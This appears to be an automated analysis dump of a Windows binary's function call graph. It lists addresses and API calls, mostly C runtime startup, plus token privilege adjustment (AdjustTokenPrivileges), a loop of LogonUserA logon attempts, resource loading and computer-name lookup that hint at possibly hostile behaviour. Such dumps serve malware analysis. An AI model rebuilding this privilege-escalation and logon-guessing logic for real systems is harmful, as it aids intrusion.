LeaveCriticalSection 15942->15945 15944 d71ce2 15944->15940 15945->15944 16720 d735bc 16721 d729eb 25 API calls 16720->16721 16722 d735ca 16721->16722 16723 d735f7 16722->16723 16724 d735d8 16722->16724 16726 d73604 16723->16726 16731 d73611 16723->16731 16725 d72122 __freea 19 API calls 16724->16725 16730 d735dd 16725->16730 16727 d72122 __freea 19 API calls 16726->16727 16727->16730 16728 d736a1 16740 d736cd 16728->16740 16731->16728 16731->16730 16732 d78f9e __wsopen_s 25 API calls 16731->16732 16733 d73694 16731->16733 16732->16733 16733->16728 16735 d79039 16733->16735 16736 d717ff __wsopen_s 20 API calls 16735->16736 16737 d79054 16736->16737 16738 d717c5 __freea 19 API calls 16737->16738 16739 d7905e 16738->16739 16739->16728 16741 d729eb 25 API calls 16740->16741 16742 d736dc 16741->16742 16743 d73780 16742->16743 16744 d736ee 16742->16744 16745 d732c5 __wsopen_s 61 API calls 16743->16745 16746 d7370b 16744->16746 16748 d73731 16744->16748 16750 d73718 16745->16750 16747 d732c5 __wsopen_s 61 API calls 16746->16747 16747->16750 16748->16750 16751 d752fb 16748->16751 16750->16730 16754 d75178 16751->16754 16753 d75311 16753->16750 16755 d75184 ___InternalCxxFrameHandler 16754->16755 16756 d7518c 16755->16756 16761 d751a4 16755->16761 16757 d7210f __wsopen_s 19 API calls 16756->16757 16759 d75191 16757->16759 16758 d75258 16760 d7210f __wsopen_s 19 API calls 16758->16760 16762 d72122 __freea 19 API calls 16759->16762 16763 d7525d 16760->16763 16761->16758 16764 d751dc 16761->16764 16774 d75199 ___InternalCxxFrameHandler 16762->16774 16766 d72122 __freea 19 API calls 16763->16766 16779 d76c41 EnterCriticalSection 16764->16779 16768 d75265 16766->16768 16767 d751e2 16769 d75206 16767->16769 16770 d7521b 16767->16770 16771 d70269 ___std_exception_copy 25 API calls 16768->16771 16773 d72122 __freea 19 API calls 16769->16773 16772 d7527d __wsopen_s 27 API calls 16770->16772 16771->16774 16777 d75216 16772->16777 16775 d7520b 16773->16775 16774->16753 16776 d7210f __wsopen_s 19 API calls 16775->16776 16776->16777 16780 d75250 16777->16780 16779->16767 16783 d76cf8 LeaveCriticalSection 16780->16783 16782 d75256 16782->16774 16783->16782 13138 d6acfe 13139 d6ad0a ___InternalCxxFrameHandler 13138->13139 13162 d6b106 13139->13162 13142 d6ad11 13143 d6ad3a 13142->13143 13188 d6b406 IsProcessorFeaturePresent 13142->13188 13147 d6ad79 13143->13147 13173 d70b98 13143->13173 13145 d6ad59 ___InternalCxxFrameHandler 13152 d6add9 13147->13152 13192 d70e16 13147->13192 13151 d6addf 13185 d67390 GetCommandLineW CommandLineToArgvW 13151->13185 13181 d6b521 13152->13181 13158 d6ae0e 13207 d6b27d 13158->13207 13159 d6ae05 13159->13158 13204 d70df1 13159->13204 13163 d6b10f 13162->13163 13213 d6b6ce IsProcessorFeaturePresent 13163->13213 13167 d6b120 13168 d6b124 13167->13168 13224 d71573 13167->13224 13168->13142 13170 d6b13b 13170->13142 13174 d70baf 13173->13174 13175 d6abe4 __Stoull 5 API calls 13174->13175 13176 d6ad53 13175->13176 13176->13145 13177 d70b3c 13176->13177 13178 d70b6b 13177->13178 13179 d6abe4 __Stoull 5 API calls 13178->13179 13180 d70b94 13179->13180 13180->13147 13361 d6d520 13181->13361 13184 d6b547 13184->13151 13363 d671e0 13185->13363 13189 d6b41c ___scrt_get_show_window_mode 13188->13189 13190 d6b4c4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 13189->13190 13191 d6b50e 13190->13191 13191->13142 13193 d6e7fb _GetRangeOfTrysToCheck 13192->13193 13194 d70e3e 13192->13194 13195 d71f5a _GetRangeOfTrysToCheck 37 API calls 13193->13195 13194->13152 13198 d6e80c 13195->13198 13196 d7184d _GetRangeOfTrysToCheck 37 API calls 13197 d6e836 13196->13197 13198->13196 13199 d6b554 GetModuleHandleW 13200 d6adfb 13199->13200 13200->13159 13201 d70e4e 13200->13201 13202 d70c0f __CreateFrameInfo 27 API calls 13201->13202 13203 d70e5f 13202->13203 13203->13159 13205 d70c0f __CreateFrameInfo 27 API calls 13204->13205 13206 d70dfc 13205->13206 13206->13158 13208 d6b289 13207->13208 13212 d6b29f 13208->13212 14935 d71585 13208->14935 13211 d6d4bf 8 API calls 13211->13212 13212->13145 13214 d6b11b 13213->13214 13215 d6d496 13214->13215 13216 d6d49b 13215->13216 13235 d6de5e 13216->13235 13219 d6d4a9 13219->13167 13221 d6d4b1 13222 d6d4bc 13221->13222 13249 d6de9a 13221->13249 13222->13167 13291 d7777b 13224->13291 13227 d6d4bf 13228 d6d4c8 13227->13228 13234 d6d4d9 13227->13234 13229 d6db5b 6 API calls 13228->13229 13230 d6d4cd 13229->13230 13231 d6de9a DeleteCriticalSection 13230->13231 13232 d6d4d2 13231->13232 13357 d6e172 13232->13357 13234->13168 13237 d6de67 13235->13237 13238 d6de90 13237->13238 13240 d6d4a5 13237->13240 13253 d6e0f2 13237->13253 13239 d6de9a DeleteCriticalSection 13238->13239 13239->13240 13240->13219 13241 d6db28 13240->13241 13272 d6e007 13241->13272 13243 d6db3d 13243->13221 13244 d6db32 13244->13243 13277 d6e0b5 13244->13277 13246 d6db4b 13247 d6db58 13246->13247 13282 d6db5b 13246->13282 13247->13221 13250 d6dea5 13249->13250 13252 d6dec4 13249->13252 13251 d6deaf DeleteCriticalSection 13250->13251 13251->13251 13251->13252 13252->13219 13258 d6dee6 13253->13258 13256 d6e129 InitializeCriticalSectionAndSpinCount 13257 d6e115 13256->13257 13257->13237 13259 d6df16 13258->13259 13260 d6df1a 13258->13260 13259->13260 13264 d6df3a 13259->13264 13265 d6df86 13259->13265 13260->13256 13260->13257 13262 d6df46 GetProcAddress 13263 d6df56 __CreateFrameInfo 13262->13263 13263->13260 13264->13260 13264->13262 13266 d6dfae LoadLibraryExW 13265->13266 13271 d6dfa3 13265->13271 13267 d6dfca GetLastError 13266->13267 13270 d6dfe2 13266->13270 13269 d6dfd5 LoadLibraryExW 13267->13269 13267->13270 13268 d6dff9 FreeLibrary 13268->13271 13269->13270 13270->13268 13270->13271 13271->13259 13273 d6dee6 __CreateFrameInfo 5 API calls 13272->13273 13274 d6e021 13273->13274 13275 d6e039 TlsAlloc 13274->13275 13276 d6e02a 13274->13276 13276->13244 13278 d6dee6 __CreateFrameInfo 5 API calls 13277->13278 13279 d6e0cf 13278->13279 13280 d6e0e9 TlsSetValue 13279->13280 13281 d6e0de 13279->13281 13280->13281 13281->13246 13283 d6db65 13282->13283 13284 d6db6b 13282->13284 13286 d6e041 13283->13286 13284->13243 13287 d6dee6 __CreateFrameInfo 5 API calls 13286->13287 13288 d6e05b 13287->13288 13289 d6e072 TlsFree 13288->13289 13290 d6e067 13288->13290 13289->13290 13290->13284 13294 d77798 13291->13294 13295 d77794 13291->13295 13292 d6abe4 __Stoull 5 API calls 13293 d6b12d 13292->13293 13293->13170 13293->13227 13294->13295 13297 d74bb5 13294->13297 13295->13292 13298 d74bc1 ___InternalCxxFrameHandler 13297->13298 13309 d75c0f EnterCriticalSection 13298->13309 13300 d74bc8 13310 d76ba9 13300->13310 13302 d74bd7 13303 d74be6 13302->13303 13323 d74a49 GetStartupInfoW 13302->13323 13334 d74c02 13303->13334 13308 d74bf7 ___InternalCxxFrameHandler 13308->13294 13309->13300 13311 d76bb5 ___InternalCxxFrameHandler 13310->13311 13312 d76bd9 13311->13312 13313 d76bc2 13311->13313 13337 d75c0f EnterCriticalSection 13312->13337 13315 d72122 __freea 19 API calls 13313->13315 13316 d76bc7 13315->13316 13317 d70269 ___std_exception_copy 25 API calls 13316->13317 13319 d76bd1 ___InternalCxxFrameHandler 13317->13319 13318 d76c11 13345 d76c38 13318->13345 13319->13302 13320 d76be5 13320->13318 13338 d76afa 13320->13338 13324 d74a66 13323->13324 13326 d74af8 13323->13326 13325 d76ba9 26 API calls 13324->13325 13324->13326 13328 d74a8f 13325->13328 13329 d74aff 13326->13329 13327 d74abd GetFileType 13327->13328 13328->13326 13328->13327 13333 d74b06 13329->13333 13330 d74b49 GetStdHandle 13330->13333 13331 d74bb1 13331->13303 13332 d74b5c GetFileType 13332->13333 13333->13330 13333->13331 13333->13332 13356 d75c57 LeaveCriticalSection 13334->13356 13336 d74c09 13336->13308 13337->13320 13339 d71890 _GetRangeOfTrysToCheck 19 API calls 13338->13339 13340 d76b0c 13339->13340 13344 d76b19 13340->13344 13348 d74f4d 13340->13348 13341 d717c5 __freea 19 API calls 13342 d76b6b 13341->13342 13342->13320 13344->13341 13355 d75c57 LeaveCriticalSection 13345->13355 13347 d76c3f 13347->13319 13349 d74c37 _GetRangeOfTrysToCheck 5 API calls 13348->13349 13350 d74f74 13349->13350 13351 d74f92 InitializeCriticalSectionAndSpinCount 13350->13351 13353 d74f7d 13350->13353 13351->13353 13352 d6abe4 __Stoull 5 API calls 13354 d74fa9 13352->13354 13353->13352 13354->13340 13355->13347 13356->13336 13358 d6e1a1 13357->13358 13359 d6e17b 13357->13359 13358->13234 13359->13358 13360 d6e18b FreeLibrary 13359->13360 13360->13359 13362 d6b534 GetStartupInfoW 13361->13362 13362->13184 13397 d7d900 13363->13397 13367 d67221 13401 d66500 13367->13401 13369 d67233 13396 d67237 WSACleanup DeleteCriticalSection 13369->13396 13429 d666c0 13369->13429 13375 d67365 13376 d6abe4 __Stoull 5 API calls 13375->13376 13380 d6737d 13376->13380 13380->13199 13565 d68340 13396->13565 13398 d671fb GetCurrentProcessId 13397->13398 13399 d66390 InitializeCriticalSection 13398->13399 13400 d663c6 ___scrt_get_show_window_mode 13399->13400 13400->13367 13570 d70058 13401->13570 13406 d6652a 13576 d62340 13406->13576 13407 d66526 13407->13369 13409 d66535 13410 d6655e GetModuleHandleA GetModuleFileNameA 13409->13410 13414 d6658d 13409->13414 13586 d62b90 GetCurrentProcess OpenProcessToken 13410->13586 13412 d6657e 13605 d660f0 13412->13605 13416 d6b97b 28 API calls 13414->13416 13417 d66597 13416->13417 13427 d6660f 13417->13427 13635 d63230 13417->13635 13419 d666a2 13419->13369 13420 d63230 79 API calls 13425 d66649 13420->13425 13421 d66678 13421->13419 13422 d6b97b 28 API calls 13421->13422 13423 d666b7 13422->13423 13424 d665ce 13424->13427 13666 d63920 13424->13666 13425->13421 13682 d63b90 13425->13682 13427->13420 13427->13421 13430 d666e6 ___scrt_get_show_window_mode 13429->13430 14326 d65770 13430->14326 13432 d666f4 13433 d6675a 13432->13433 13434 d666f8 GetFileAttributesA 13432->13434 14340 d65c20 13433->14340 13434->13433 13437 d66711 ___scrt_get_show_window_mode 13434->13437 13436 d6675f 13436->13437 13438 d66763 13436->13438 13439 d66724 GetModuleHandleW GetModuleFileNameW 13437->13439 13440 d6abe4 __Stoull 5 API calls 13438->13440 13441 d65dd0 37 API calls 13439->13441 13443 d66752 ExitProcess 13441->13443 13566 d68349 13565->13566 13569 d68359 13565->13569 13567 d70279 25 API calls 13566->13567 13566->13569 13568 d683b5 13567->13568 13569->13375 13695 d6ffd9 13570->13695 13572 d6650a 13573 d6e328 13572->13573 13710 d71f5a GetLastError 13573->13710 13575 d66510 WSAStartup 13575->13406 13575->13407 13577 d623a3 13576->13577 13578 d6251c 13577->13578 13581 d623e8 ___scrt_get_show_window_mode 13577->13581 13579 d6abe4 __Stoull 5 API calls 13578->13579 13580 d6252f 13579->13580 13580->13409 13582 d62500 13581->13582 13854 d67570 13581->13854 13583 d6abe4 __Stoull 5 API calls 13582->13583 13584 d62516 13583->13584 13584->13409 13587 d62bd2 13586->13587 13588 d62be7 GetTokenInformation 13586->13588 13591 d6abe4 __Stoull 5 API calls 13587->13591 13589 d62c0a 13588->13589 13590 d62cf7 13588->13590 13594 d702c9 ___std_exception_copy 20 API calls 13589->13594 13592 d62d0a 13590->13592 13593 d62d03 CloseHandle 13590->13593 13595 d62be3 13591->13595 13597 d6abe4 __Stoull 5 API calls 13592->13597 13593->13592 13596 d62c13 13594->13596 13595->13412 13596->13590 13598 d62c20 GetTokenInformation 13596->13598 13599 d62d1d 13597->13599 13600 d62cec 13598->13600 13603 d62c3a ___scrt_get_show_window_mode 13598->13603 13599->13412 13601 d7009a ___std_exception_copy 20 API calls 13600->13601 13601->13590 13602 d62c61 LookupPrivilegeNameW 13602->13603 13603->13600 13603->13602 13604 d62c89 AdjustTokenPrivileges 13603->13604 13604->13603 13606 d66157 13605->13606 13607 d6611e ___scrt_get_show_window_mode 13605->13607 13608 d6614b ___scrt_get_show_window_mode 13606->13608 13609 d6619e GetModuleHandleA GetProcAddress 13606->13609 13610 d66131 GetVersionExW 13607->13610 13608->13606 13613 d66174 GetVersionExW 13608->13613 13611 d661bb 13609->13611 13612 d661c0 GetCurrentProcess IsWow64Process 13609->13612 13610->13606 13610->13608 13885 d62eb0 13611->13885 13612->13611 13613->13609 13615 d6618e 13613->13615 13615->13609 13616 d66219 13915 d6eab8 13616->13915 13619 d6eab8 __Stoull 42 API calls 13620 d66247 13619->13620 13621 d66266 13620->13621 13622 d7009a ___std_exception_copy 20 API calls 13620->13622 13622->13621 13636 d6348e 13635->13636 13637 d63253 13635->13637 13638 d6abe4 __Stoull 5 API calls 13636->13638 13637->13636 14086 d6a670 13637->14086 13640 d6349d 13638->13640 13640->13424 13641 d63284 13642 d6abe4 __Stoull 5 API calls 13641->13642 13643 d63296 13642->13643 13643->13424 13644 d63280 13644->13641 14097 d6aad0 13644->14097 13646 d63304 13646->13641 14108 d6a6f0 13646->14108 13650 d6333b 13650->13641 13651 d63346 13650->13651 13651->13636 14124 d6a840 13651->14124 13653 d6336e 13653->13636 14138 d6a550 13653->14138 13667 d6397b 13666->13667 13675 d63b5b 13666->13675 13667->13675 14247 d61f60 InitializeCriticalSection 13667->14247 13668 d6abe4 __Stoull 5 API calls 13669 d63b86 13668->13669 13669->13427 13671 d639a6 14248 d636a0 13671->14248 13673 d63b3d DeleteCriticalSection 13674 d68340 25 API calls 13673->13674 13674->13675 13675->13668 13676 d63b62 13677 d6b97b 28 API calls 13676->13677 13677->13675 13678 d639ba ___scrt_get_show_window_mode 13678->13673 13678->13676 13679 d63a1f LogonUserA 13678->13679 14261 d62540 13678->14261 13679->13678 13680 d63a48 GetLastError 13679->13680 13680->13678 13683 d63bd0 13682->13683 13690 d63d6e 13682->13690 13684 d63bd8 InitializeCriticalSection 13683->13684 13683->13690 13685 d636a0 47 API calls 13684->13685 13691 d63c17 ___scrt_get_show_window_mode 13685->13691 13686 d6abe4 __Stoull 5 API calls 13687 d63d99 13686->13687 13687->13421 13688 d63d50 DeleteCriticalSection 13689 d68340 25 API calls 13688->13689 13689->13690 13690->13686 13691->13688 13691->13691 13692 d63d75 13691->13692 13694 d62540 30 API calls 13691->13694 13693 d6b97b 28 API calls 13692->13693 13693->13690 13694->13691 13696 d6ffe8 13695->13696 13697 d6fffc 13695->13697 13698 d72122 __freea 19 API calls 13696->13698 13701 d6fff8 __alldvrm 13697->13701 13703 d74ef7 13697->13703 13700 d6ffed 13698->13700 13702 d70269 ___std_exception_copy 25 API calls 13700->13702 13701->13572 13702->13701 13704 d74c37 _GetRangeOfTrysToCheck 5 API calls 13703->13704 13705 d74f1e 13704->13705 13706 d74f2a 13705->13706 13707 d74f36 GetSystemTimeAsFileTime 13705->13707 13708 d6abe4 __Stoull 5 API calls 13706->13708 13707->13706 13709 d74f47 13708->13709 13709->13701 13711 d71f70 13710->13711 13715 d71f76 13710->13715 13712 d74e48 _GetRangeOfTrysToCheck 11 API calls 13711->13712 13712->13715 13713 d71890 _GetRangeOfTrysToCheck 19 API calls 13714 d71f88 13713->13714 13716 d71f90 13714->13716 13718 d74e9e _GetRangeOfTrysToCheck 11 API calls 13714->13718 13715->13713 13717 d71fc5 SetLastError 13715->13717 13719 d717c5 __freea 19 API calls 13716->13719 13717->13575 13720 d71fa5 13718->13720 13721 d71f96 13719->13721 13720->13716 13722 d71fac 13720->13722 13723 d71fd1 SetLastError 13721->13723 13724 d71dcc _GetRangeOfTrysToCheck 19 API calls 13722->13724 13730 d7184d 13723->13730 13725 d71fb7 13724->13725 13728 d717c5 __freea 19 API calls 13725->13728 13729 d71fbe 13728->13729 13729->13717 13729->13723 13741 d77937 13730->13741 13734 d71867 IsProcessorFeaturePresent 13736 d71872 13734->13736 13739 d7009f __CreateFrameInfo 8 API calls 13736->13739 13737 d7185d 13737->13734 13740 d71885 13737->13740 13739->13740 13771 d70e00 13740->13771 13774 d778a5 13741->13774 13744 d77992 13745 d7799e _GetRangeOfTrysToCheck 13744->13745 13746 d71fde __CreateFrameInfo 19 API calls 13745->13746 13747 d779c5 __CreateFrameInfo 13745->13747 13750 d779cb __CreateFrameInfo 13745->13750 13746->13747 13748 d77a17 13747->13748 13747->13750 13751 d779fa 13747->13751 13749 d72122 __freea 19 API calls 13748->13749 13752 d77a1c 13749->13752 13758 d77a43 13750->13758 13787 d75c0f EnterCriticalSection 13750->13787 13796 d7d7c9 13751->13796 13753 d70269 ___std_exception_copy 25 API calls 13752->13753 13753->13751 13761 d77aa2 13758->13761 13762 d77a9a 13758->13762 13768 d77acd 13758->13768 13788 d75c57 LeaveCriticalSection 13758->13788 13760 d70e00 __CreateFrameInfo 27 API calls 13760->13761 13761->13768 13789 d77989 13761->13789 13762->13760 13766 d71f5a _GetRangeOfTrysToCheck 37 API calls 13769 d77b30 13766->13769 13767 d77989 __CreateFrameInfo 37 API calls 13767->13768 13792 d77b52 13768->13792 13769->13751 13770 d71f5a _GetRangeOfTrysToCheck 37 API calls 13769->13770 13770->13751 13800 d70c0f 13771->13800 13777 d7784b 13774->13777 13776 d71852 13776->13737 13776->13744 13778 d77857 ___InternalCxxFrameHandler 13777->13778 13783 d75c0f EnterCriticalSection 13778->13783 13780 d77865 13784 d77899 13780->13784 13782 d7788c ___InternalCxxFrameHandler 13782->13776 13783->13780 13785 d75c57 __CreateFrameInfo LeaveCriticalSection 13784->13785 13786 d778a3 13785->13786 13786->13782 13787->13758 13788->13762 13790 d71f5a _GetRangeOfTrysToCheck 37 API calls 13789->13790 13791 d7798e 13790->13791 13791->13767 13793 d77b58 13792->13793 13795 d77b21 13792->13795 13799 d75c57 LeaveCriticalSection 13793->13799 13795->13751 13795->13766 13795->13769 13797 d6abe4 __Stoull 5 API calls 13796->13797 13798 d7d7d4 13797->13798 13798->13798 13799->13795 13801 d70c1b _GetRangeOfTrysToCheck 13800->13801 13803 d6b554 __CreateFrameInfo GetModuleHandleW 13801->13803 13809 d70c33 13801->13809 13805 d70c27 13803->13805 13804 d70c3b 13819 d70cb0 13804->13819 13820 d70cd9 13804->13820 13830 d71401 13804->13830 13805->13809 13822 d70d69 GetModuleHandleExW 13805->13822 13829 d75c0f EnterCriticalSection 13809->13829 13810 d70cf6 13836 d70d28 13810->13836 13811 d70d22 13816 d7d7c9 __CreateFrameInfo 5 API calls 13811->13816 13812 d70b3c __CreateFrameInfo 5 API calls 13812->13820 13814 d70b3c __CreateFrameInfo 5 API calls 13817 d70cc8 13814->13817 13818 d70d27 13816->13818 13817->13812 13819->13814 13819->13817 13833 d70d19 13820->13833 13823 d70d93 GetProcAddress 13822->13823 13826 d70da8 13822->13826 13823->13826 13824 d70dc5 13827 d6abe4 __Stoull 5 API calls 13824->13827 13825 d70dbc FreeLibrary 13825->13824 13826->13824 13826->13825 13828 d70dcf 13827->13828 13828->13809 13829->13804 13844 d7113a 13830->13844 13847 d75c57 LeaveCriticalSection 13833->13847 13835 d70cf2 13835->13810 13835->13811 13848 d750bb 13836->13848 13845 d710e9 __CreateFrameInfo 19 API calls 13844->13845 13846 d7115e 13845->13846 13846->13819 13847->13835 13849 d750e0 13848->13849 13850 d750d6 13848->13850 13855 d67586 EnterCriticalSection 13854->13855 13856 d6757e 13854->13856 13857 d6759b 13855->13857 13858 d675c1 13855->13858 13856->13581 13857->13858 13860 d675a1 13857->13860 13859 d675b0 LeaveCriticalSection 13858->13859 13862 d683c0 28 API calls 13858->13862 13859->13581 13860->13859 13864 d683c0 13860->13864 13862->13859 13865 d683d6 13864->13865 13866 d6840e 13864->13866 13867 d68414 13865->13867 13868 d683ec 13865->13868 13866->13859 13870 d6b95b 28 API calls 13867->13870 13872 d685e0 13868->13872 13871 d6841e 13870->13871 13873 d685f7 13872->13873 13874 d6b93e RaiseException 13873->13874 13875 d686bc 13874->13875 13876 d6b93e RaiseException 13875->13876 13877 d686c1 13876->13877 13880 d70279 13877->13880 13881 d701ee ___std_exception_copy 25 API calls 13880->13881 13882 d70288 13881->13882 13883 d70296 ___std_exception_copy 11 API calls 13882->13883 13884 d70295 13883->13884 13886 d62ed6 13885->13886 13887 d62edd 13886->13887 13888 d62eef GetCurrentProcess 13886->13888 13889 d6abe4 __Stoull 5 API calls 13887->13889 13890 d62f15 13888->13890 13891 d62eeb 13889->13891 13890->13887 13892 d62f1c OpenProcessToken 13890->13892 13891->13616 13892->13887 13893 d62f30 13892->13893 13893->13887 13937 d62820 13893->13937 13895 d62f4f 13895->13887 13896 d62f53 ___scrt_get_show_window_mode 13895->13896 13954 d62650 13896->13954 13898 d62f7b 13961 d6e837 13915->13961 13938 d6282e 13937->13938 13939 d62859 13938->13939 13940 d702c9 ___std_exception_copy 20 API calls 13938->13940 13939->13895 13941 d6288b 13940->13941 13942 d62894 13941->13942 13943 d628b0 IsValidSid 13941->13943 13951 d628ee 13941->13951 13942->13895 13944 d628bc GetLengthSid 13943->13944 13943->13951 13945 d628ca 13944->13945 13944->13951 13946 d702c9 ___std_exception_copy 20 API calls 13945->13946 13948 d7009a ___std_exception_copy 20 API calls 13950 d62906 13948->13950 13950->13895 13951->13948 13951->13950 13955 d62667 13954->13955 13956 d6266e 13955->13956 13957 d62673 LookupAccountSidW 13955->13957 13956->13898 13957->13898 13962 d6e864 13961->13962 13963 d6e873 13962->13963 13964 d6e88b 13962->13964 13975 d6e868 13962->13975 13966 d72122 __freea 19 API calls 13963->13966 13987 d6e412 13964->13987 13969 d6e878 13966->13969 13967 d6abe4 __Stoull 5 API calls 13971 d66230 13967->13971 13972 d70269 ___std_exception_copy 25 API calls 13969->13972 13970 d6ea38 13974 d6ea65 WideCharToMultiByte 13970->13974 13981 d6ea43 13970->13981 13971->13619 13972->13975 13973 d6e8a1 13976 d6e949 WideCharToMultiByte 13973->13976 13978 d6e8ac 13973->13978 13984 d6e8e6 WideCharToMultiByte 13973->13984 13974->13981 13975->13967 13976->13978 13977 d72122 __freea 19 API calls 13977->13975 13978->13975 13983 d72122 __freea 19 API calls 13978->13983 13981->13975 13981->13977 13983->13975 13984->13978 13988 d6e42f 13987->13988 13994 d6e425 13987->13994 13989 d71f5a _GetRangeOfTrysToCheck 37 API calls 13988->13989 13988->13994 13990 d6e450 13989->13990 13994->13970 13994->13973 14087 d6a6dc 14086->14087 14088 d6a679 14086->14088 14087->13644 14089 d702c9 ___std_exception_copy 20 API calls 14088->14089 14090 d6a680 14089->14090 14090->14087 14091 d6eab8 __Stoull 42 API calls 14090->14091 14092 d6a69c 14091->14092 14094 d6a6af 14092->14094 14172 d6a5d0 14092->14172 14095 d7009a ___std_exception_copy 20 API calls 14094->14095 14096 d6a6d3 14094->14096 14095->14096 14096->13644 14098 d6ab80 14097->14098 14099 d6aae5 14097->14099 14098->13646 14099->14098 14100 d6aaf8 GetModuleHandleW 14099->14100 14101 d6ab14 FindResourceW 14100->14101 14107 d6ab56 14100->14107 14102 d6ab25 LoadResource 14101->14102 14101->14107 14103 d6ab31 LockResource 14102->14103 14102->14107 14104 d6ab3f SizeofResource 14103->14104 14103->14107 14105 d6ab4d 14104->14105 14104->14107 14106 d6a6f0 2 API calls 14105->14106 14106->14107 14107->13646 14109 d6a6fa 14108->14109 14111 d6331f 14108->14111 14110 d6a6fe GetProcessHeap RtlAllocateHeap 14109->14110 14109->14111 14110->14111 14111->13641 14112 d6a4b0 14111->14112 14113 d6a535 14112->14113 14115 d6a4d2 14112->14115 14114 d6abe4 __Stoull 5 API calls 14113->14114 14116 d6a542 14114->14116 14115->14113 14117 d6a4e2 ___scrt_get_show_window_mode 14115->14117 14116->13650 14198 d68ee0 14117->14198 14121 d6a523 14122 d6abe4 __Stoull 5 API calls 14121->14122 14125 d6a9a6 14124->14125 14126 d6a853 14124->14126 14125->13653 14213 d6a730 14126->14213 14139 d6a55f 14138->14139 14140 d6a5c2 14138->14140 14139->14140 14173 d6a5ee 14172->14173 14174 d6a65c 14172->14174 14173->14174 14177 d6a5f6 ___scrt_get_show_window_mode 14173->14177 14175 d6abe4 __Stoull 5 API calls 14174->14175 14176 d6a66b 14175->14176 14176->14094 14184 d61810 14177->14184 14182 d6abe4 __Stoull 5 API calls 14183 d6a658 14182->14183 14183->14094 14185 d61827 14184->14185 14186 d6185c 14184->14186 14185->14186 14194 d61110 14185->14194 14188 d61870 14186->14188 14189 d618a7 14188->14189 14190 d61886 ___scrt_get_show_window_mode 14188->14190 14191 d61110 5 API calls 14189->14191 14192 d61110 5 API calls 14190->14192 14191->14190 14193 d61957 14192->14193 14193->14182 14195 d61130 14194->14195 14196 d6abe4 __Stoull 5 API calls 14195->14196 14197 d617ff 14196->14197 14197->14185 14199 d69073 14198->14199 14200 d6abe4 __Stoull 5 API calls 14199->14200 14201 d691a7 14200->14201 14202 d6a420 14201->14202 14203 d6a478 14202->14203 14204 d6a431 14202->14204 14203->14121 14204->14203 14206 d68e40 14204->14206 14207 d68e65 14206->14207 14212 d68e78 14206->14212 14210 d6abe4 __Stoull 5 API calls 14212->14210 14214 d6a82d 14213->14214 14217 d6a753 ___scrt_get_show_window_mode 14213->14217 14215 d6abe4 __Stoull 5 API calls 14214->14215 14216 d6a839 14215->14216 14218 d6a785 14217->14218 14219 d6a796 14217->14219 14220 d6abe4 __Stoull 5 API calls 14218->14220 14247->13671 14249 d636dc 14248->14249 14253 d638ef 14248->14253 14249->14253 14271 d67980 14249->14271 14251 d6abe4 __Stoull 5 API calls 14252 d63910 14251->14252 14252->13678 14253->14251 14254 d638dd 14254->14253 14278 d682e0 14254->14278 14256 d67900 28 API calls 14258 d636f2 ___scrt_get_show_window_mode 14256->14258 14257 d682e0 25 API calls 14257->14258 14258->14254 14258->14256 14258->14257 14259 d6eab8 42 API calls __Stoull 14258->14259 14260 d62540 30 API calls 14258->14260 14259->14258 14260->14258 14262 d6255a 14261->14262 14263 d62552 14261->14263 14264 d62625 14262->14264 14267 d62637 14262->14267 14270 d6261a 14262->14270 14263->13678 14265 d67570 30 API calls 14264->14265 14266 d6262e 14265->14266 14266->13678 14268 d6b97b 28 API calls 14267->14268 14269 d62641 14268->14269 14270->13678 14272 d679a1 14271->14272 14275 d679b3 14271->14275 14283 d67f20 14272->14283 14274 d679ac 14274->14258 14276 d67f20 28 API calls 14275->14276 14277 d679d9 14276->14277 14277->14258 14279 d68320 14278->14279 14282 d682f0 14278->14282 14280 d70279 25 API calls 14279->14280 14281 d68339 14280->14281 14282->14253 14284 d67f76 14283->14284 14288 d67f2e 14283->14288 14285 d67f86 14284->14285 14286 d6800e 14284->14286 14291 d67f96 14285->14291 14309 d687e0 14285->14309 14287 d6b95b 28 API calls 14286->14287 14290 d68018 14287->14290 14288->14284 14292 d67f55 14288->14292 14291->14274 14295 d684a0 14292->14295 14294 d67f70 14294->14274 14296 d684b9 14295->14296 14297 d685b2 14295->14297 14299 d68510 14296->14299 14300 d684c7 14296->14300 14298 d6b97b 28 API calls 14297->14298 14298->14300 14301 d685c6 14299->14301 14302 d6851c 14299->14302 14303 d6b97b 28 API calls 14300->14303 14307 d684d3 14300->14307 14304 d6b95b 28 API calls 14301->14304 14305 d687e0 27 API calls 14302->14305 14308 d6852c 14302->14308 14303->14301 14305->14308 14307->14294 14308->14294 14310 d68824 14309->14310 14315 d6abfa 14310->14315 14317 d6abff 14315->14317 14316 d702c9 ___std_exception_copy 20 API calls 14316->14317 14317->14316 14318 d6ac2b 14317->14318 14319 d702e8 _GetRangeOfTrysToCheck 7 API calls 14317->14319 14320 d6b93e RaiseException 14317->14320 14322 d6b063 14317->14322 14319->14317 14320->14317 14327 d6d520 ___scrt_get_show_window_mode 14326->14327 14328 d65799 GetComputerNameA 14327->14328 14329 d657cf 14328->14329 14330 d657be 14328->14330 14354 d65670 14329->14354 14332 d6abe4 __Stoull 5 API calls 14330->14332 14334 d657cb 14332->14334 14333 d657f1 14333->14330 14335 d657f8 ___scrt_get_show_window_mode 14333->14335 14334->13432 14336 d7009a ___std_exception_copy 20 API calls 14335->14336 14338 d65872 14335->14338 14336->14338 14337 d6abe4 __Stoull 5 API calls 14339 d658da 14337->14339 14338->14337 14339->13432 14341 d65c46 ___scrt_get_show_window_mode 14340->14341 14420 d65970 14341->14420 14343 d65c54 14344 d65c58 14343->14344 14345 d65c66 GetFileAttributesA 14343->14345 14348 d6abe4 __Stoull 5 API calls 14344->14348 14346 d65c78 14345->14346 14347 d65c8b GetFileAttributesA 14345->14347 14349 d6abe4 __Stoull 5 API calls 14346->14349 14351 d6abe4 __Stoull 5 API calls 14347->14351 14350 d65c62 14348->14350 14352 d65c87 14349->14352 14350->13436 14353 d65cac 14351->14353 14352->13436 14353->13436 14355 d65696 14354->14355 14356 d65751 14354->14356 14355->14356 14359 d656a6 ___scrt_get_show_window_mode 14355->14359 14357 d6abe4 __Stoull 5 API calls 14356->14357 14358 d65764 14357->14358 14358->14333 14360 d61810 5 API calls 14359->14360 14361 d6571f 14360->14361 14362 d61870 5 API calls 14361->14362 14363 d6572f 14362->14363 14368 d65600 14363->14368 14365 d6573c 14366 d6abe4 __Stoull 5 API calls 14365->14366 14367 d6574d 14366->14367 14367->14333 14369 d65665 14368->14369 14370 d6560b 14368->14370 14369->14365 14370->14369 14371 d702c9 ___std_exception_copy 20 API calls 14370->14371 14372 d6561a 